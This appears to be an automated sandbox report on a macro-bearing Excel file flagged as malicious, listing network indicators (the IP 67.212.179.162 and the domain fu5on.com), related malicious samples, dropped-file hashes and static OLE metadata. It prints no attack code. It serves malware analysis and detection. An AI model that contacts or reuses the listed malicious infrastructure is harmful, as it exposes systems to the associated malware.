                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      67.212.179.162
                                                                                                                                                      unknownUnited States
                                                                                                                                                      32475SINGLEHOP-LLCUSfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:324300
                                                                                                                                                      Start date:29.11.2020
                                                                                                                                                      Start time:04:10:34
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 21s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:document-1322008235.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:24
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.expl.evad.winXLS@3/6@1/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.193.48, 52.109.76.68, 52.109.76.34, 52.109.8.25, 51.104.139.180, 2.20.84.85, 20.54.26.129, 8.248.117.254, 67.27.235.126, 67.26.73.254, 8.248.147.254, 8.248.131.254, 51.11.168.160, 92.122.213.194, 92.122.213.247
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      67.212.179.162document-1322008235.xlsGet hashmaliciousBrowse
                                                                                                                                                        document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                          document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                            document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                  document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                    document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                      document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                        document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                          document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                            document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            document-1367992196.xlsGet hashmaliciousBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              fu5on.comdocument-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1367992196.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162

                                                                                                                                                                                              ASN

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              SINGLEHOP-LLCUSdocument-1322008235.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1367992196.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e192019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1443146531.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1453508098.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1443646287.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1452240368.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              case4092.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1448493973.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 67.212.179.162

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ABA93C79-1465-4B1E-80F4-58D9A2481301
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):129952
                                                                                                                                                                                              Entropy (8bit):5.378313104336601
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:acQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:wmQ9DQW+zBX8u
                                                                                                                                                                                              MD5:49F65F0DE560014CA20541EB7BE9BBEF
                                                                                                                                                                                              SHA1:2EA754EF78E6A5440C8484522BD01E652AB11D87
                                                                                                                                                                                              SHA-256:E18C2E94E6FDC456FA58CB24005D64D15F56D4C9662CB2640BD1CB4B16DA5E66
                                                                                                                                                                                              SHA-512:216ADDEE0524E70CFB7532E02342BAC6AE6DD85F1526484ABEC9E3408AE0F9750696381B9C30CDABFB06311275C3339A23F26C48417D6A2F0CD76EE0E8EC5C19
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-29T03:11:30">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\2B910000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):314687
                                                                                                                                                                                              Entropy (8bit):7.985677529759165
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:mBXrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Mn:GFPM8R3AsB+bjej/9ci
                                                                                                                                                                                              MD5:AEF2E2150E369D2575E243F8380A8BF5
                                                                                                                                                                                              SHA1:95903014DEBDDB9886DC03A8DDDD56714B17E4BD
                                                                                                                                                                                              SHA-256:1754C720559F41CF7B56BAB2D2AA064D272E5943699A255F9E3B124EB90656F9
                                                                                                                                                                                              SHA-512:7E02EC5AD9D0357D36FB20CC6CE5C4A80B417376779F9F6BC70BE752F6FCD91D502DF573725AC4A64864B40BA166FFB2B08366BFA235E81236F4BD9258074B9A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: .V.n.0....?......(..r.izl.$...\K....I..RV.4p,.6.^..vfv....jcM....w5..f..'........WV`.N....l....?.....h.5kS..8G..X...VV>Z..66<...........%p.L..-..a%.L*n6.x.d..+.w.e......".P...+..VZ.....t.!.P..$k..51.;H..C..r....6k...GD08Mf.CE.]*...7....>.q...Q+(nEL?.%....'..K...a.l...6.L.9VY!..qbi..v...0u.......n....t.#::.S.........;.;.........C......=....@....r.f..;...;..m.ik..\....s+"..Dm.9....#:T.OY../N............p.....> .....<O..]....4.3e_...i...1.@....O..........PK..........!.C.T.....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sun Nov 29 11:11:33 2020, atime=Sun Nov 29 11:11:33 2020, length=8192, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                              Entropy (8bit):4.632909396636218
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:8g6/CXUleuElPCH21YgLZY/2+A+WrjAZ/2bDTDLC5Lu4t2Y+xIBjKZm:8g6/qBLSOAZiDW87aB6m
                                                                                                                                                                                              MD5:DB706552C7D73F4B949BFC8B39FF0133
                                                                                                                                                                                              SHA1:6B955E777A065A55346BBE09429CAE4FAE8BBD49
                                                                                                                                                                                              SHA-256:FABFB56ED98CB3FBD36048A1FE2BF18B5C24B1083BB8B3FBCDF82E087CF78F0E
                                                                                                                                                                                              SHA-512:B6AAD53AA13235C67F853D849745F7EE82F4B669B55AB6AF6894249473C599E0A940A3858D0085E9B23A05046A75BC9B99FA49819851D319791057CC47E21754
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F........N....-...s7.H....s7.H.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Qca....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Qca.....S....................i...h.a.r.d.z.....~.1.....}Qqa..Desktop.h.......Ny.}Qqa.....Y..............>.....|R@.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......358075...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1322008235.xls.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sun Nov 29 11:11:33 2020, atime=Sun Nov 29 11:11:33 2020, length=338944, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4400
                                                                                                                                                                                              Entropy (8bit):4.662682953382136
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8HAjjRPuDGB6pHAjjRPuDGB6pzAjjRPuDGB6pzAjjRPuDGB6:8HidqGKHidqGKzidqGKzidqG
                                                                                                                                                                                              MD5:9C60E1973862EF71DC5C3EFEFAB3FA48
                                                                                                                                                                                              SHA1:2C57AFD0501D9CBF3C287A6C5695080FAD98E546
                                                                                                                                                                                              SHA-256:BD1AAE6032A7DEBEB286E04D1CC365B53A2FD74EA39B402D4634706B60EC4610
                                                                                                                                                                                              SHA-512:FE3AAB9760FF7D34B2F204667A2BB58549414AEB460EC193BFD5D6DFC105C68D617810F1FF84C8D1685420DDE943562386BE37B21705423106BEC10C0072DAAC
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F.... .....D.:.....@.H.....@.H....,...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Qca....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Qca.....S....................i...h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.}Qca.....Y..............>......?d.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..,..}Qla .DOCUME~1.XLS..`......>Qux}Qla....h.......................d.d.o.c.u.m.e.n.t.-.1.3.2.2.0.0.8.2.3.5...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1322008235.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.3.2.2.0.0.8.2.3.5...x.l.s.........:..,.LB.)...As...`.......X.......358075...........!a..%.H.VZAj...G..-.........-..!a..%.H.VZAj...G..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                              Entropy (8bit):4.682821678194146
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:dj6Y9L+//bEL+//hY9L+//bEL+//hY9L+//bEL+//hY9L+//l:dmF//P//hF//P//hF//P//hF//l
                                                                                                                                                                                              MD5:63D49807DA3518708ADB7567D6AECA6E
                                                                                                                                                                                              SHA1:56C88993BA779B4F1E9F88D7E9EA5D4634AA64EB
                                                                                                                                                                                              SHA-256:02015A5D22C567DDC662124291A13A9696E5B208A382D13265089D10E14673AD
                                                                                                                                                                                              SHA-512:B484D80A84EF1CD96A4B9B0056D411C0134E16BA516F742DE31CF7C8DB0198661993A5D53162617F19BDC8B6FBD20015E8235CAC580DC75D1596DD5B87AC2B9E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Desktop.LNK=0..[xls]..document-1322008235.xls.LNK=0..document-1322008235.xls.LNK=0..[xls]..document-1322008235.xls.LNK=0..document-1322008235.xls.LNK=0..[xls]..document-1322008235.xls.LNK=0..document-1322008235.xls.LNK=0..[xls]..document-1322008235.xls.LNK=0..
                                                                                                                                                                                              C:\Users\user\Desktop\DB910000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):398835
                                                                                                                                                                                              Entropy (8bit):7.192432125853034
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:8cKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdl:zizo8RnsIROnr6n75Yrxg/
                                                                                                                                                                                              MD5:0D6E1406E0EFDF21AE3568B86F57ACA2
                                                                                                                                                                                              SHA1:AA13722CC10EC20B5E60EBE0AC15F3F53BBC40F4
                                                                                                                                                                                              SHA-256:FB345723A3C0298F575FB4DEB20E6AAD54AE5796C55C9F8AF6593392D2046B24
                                                                                                                                                                                              SHA-512:21413520297C22C2E37C2E344E6AA3780822DC4C626CD240BD0ECE29CF5CA59A23348C3ED308B7A23711A9A768933915ED3C225E87D8D436D94E56A7D0BEA5AE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: ........T8..........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......>..........C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......<..........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:48:42 2020, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.5234718640432785
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:document-1322008235.xls
                                                                                                                                                                                              File size:338944
                                                                                                                                                                                              MD5:59022091fba61b5021c8ab0c7c9b10e2
                                                                                                                                                                                              SHA1:18b016bd5694b3255dec5d3e45668c4b6d299154
                                                                                                                                                                                              SHA256:85a025f978905bee6b50f641abddb5a628702d90a6227b6c146ad4b8f096feeb
                                                                                                                                                                                              SHA512:8d45d72c8d11141a7989822b8b5895b97504dec4622a3c353e4b23bb0d111eecd180fe0ff1d5266cda932eafe499fd94ed69c558dfb4df476a8d1ec6a773c75f
                                                                                                                                                                                              SSDEEP:6144:QcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTw:4izo8RnsIROnr6n75Yh
                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "document-1322008235.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                                              Last Saved Time:2020-11-26 09:48:42
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:0

                                                                                                                                                                                              Document Summary

                                                                                                                                                                                              Document Code Page:1251
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                                              Shared Document:False
                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:917504

                                                                                                                                                                                              Streams

